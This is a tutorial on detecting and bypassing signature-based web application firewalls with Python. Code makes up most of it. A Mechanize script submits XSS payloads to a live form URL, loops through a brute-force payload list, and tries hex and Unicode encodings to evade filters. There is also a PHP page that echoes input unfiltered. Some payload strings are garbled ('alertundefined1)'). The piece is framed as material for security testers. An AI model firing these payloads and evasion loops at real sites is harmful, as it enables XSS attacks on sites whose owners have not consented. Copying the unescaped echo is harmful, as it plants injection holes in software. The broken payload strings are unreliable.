How to Detect and Bypass Signature‑Based Web Application Firewalls with Python

What is a signature‑based firewall?

In a signature‑based firewall you can define custom signatures to match known attack patterns, such as XSS payloads containing <script> or alert(), and block requests that contain those patterns.

How to determine if a target has a WAF?

When testing a system, first send a known payload; if the response contains traces of a WAF (e.g., Mod_Security), the request was filtered.

HTTP/1.1 406 Not Acceptable
Date: Mon, 10 Jan 2016
Server: nginx
Content-Type: text/html; charset=iso-8859-1
Not Acceptable! ... generated by Mod_Security

The article then provides a step‑by‑step Python script to automate detection and bypass.

Step 1: Define HTML form and PHP script

<html>
<body>
<form name="waf" action="waf.php" method="post">
Data: <input type="text" name="data"><br>
<input type="submit" value="Submit">
</form>
</body>
</html>

<html>
<body>
Data from the form : <?php echo $_POST["data"]; ?><br>
</body>
</html>

Step 2: Prepare malicious request using Mechanize

import mechanize as mec
maliciousRequest = mec.Browser()
formName = 'waf'
maliciousRequest.open("http://check.cyberpersons.com/crossSiteCheck.html")
maliciousRequest.select_form(formName)

The code imports the Mechanize module, creates a browser instance, opens the target URL, and selects the form named "waf".

Step 3: Prepare payload

crossSiteScriptingPayLoad = "<svg><script>alert`1`<p>"
maliciousRequest.form['data'] = crossSiteScriptingPayLoad

Step 4: Submit form and record response

maliciousRequest.submit()
response = maliciousRequest.response().read()
print response

When no firewall is present, the payload is echoed in the HTML response, showing that the application lacks filtering.

Step 5: Detect specific firewalls

if response.find('WebKnight') >= 0:
    print "Firewall detected: WebKnight"
elif response.find('Mod_Security') >= 0:
    print "Firewall detected: Mod Security"
elif response.find('dotDefender') >= 0:
    print "Firewall detected: Dot Defender"
else:
    print "No Firewall Present"

Brute‑force payload testing

Iterate over a list of payloads and repeat the detection logic for each.

listofPayloads = ['<dialog open="" onclose="alertundefined1)">...', '<svg><script>prompt(1)<i>', '<a href="javascript:alertundefined1)">CLICK ME</a>']
for payLoads in listofPayloads:
    # same request logic as above
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()
    response = maliciousRequest.response().read()
    # detection code as before

Encoding tricks

Convert HTML tags to Unicode or hex entities to bypass filters that block raw characters.

listofPayloads = ['<b>','\u003cb\u003e','\x3cb\x3e']
for payLoads in listofPayloads:
    maliciousRequest.form['data'] = payLoads
    maliciousRequest.submit()
    response = maliciousRequest.response().read()
    print "---"
    print response
    print "---"

Summary

Understanding how signature‑based WAFs operate and using Python to detect, test, and attempt to bypass them is essential for security testers and helps improve overall web security posture.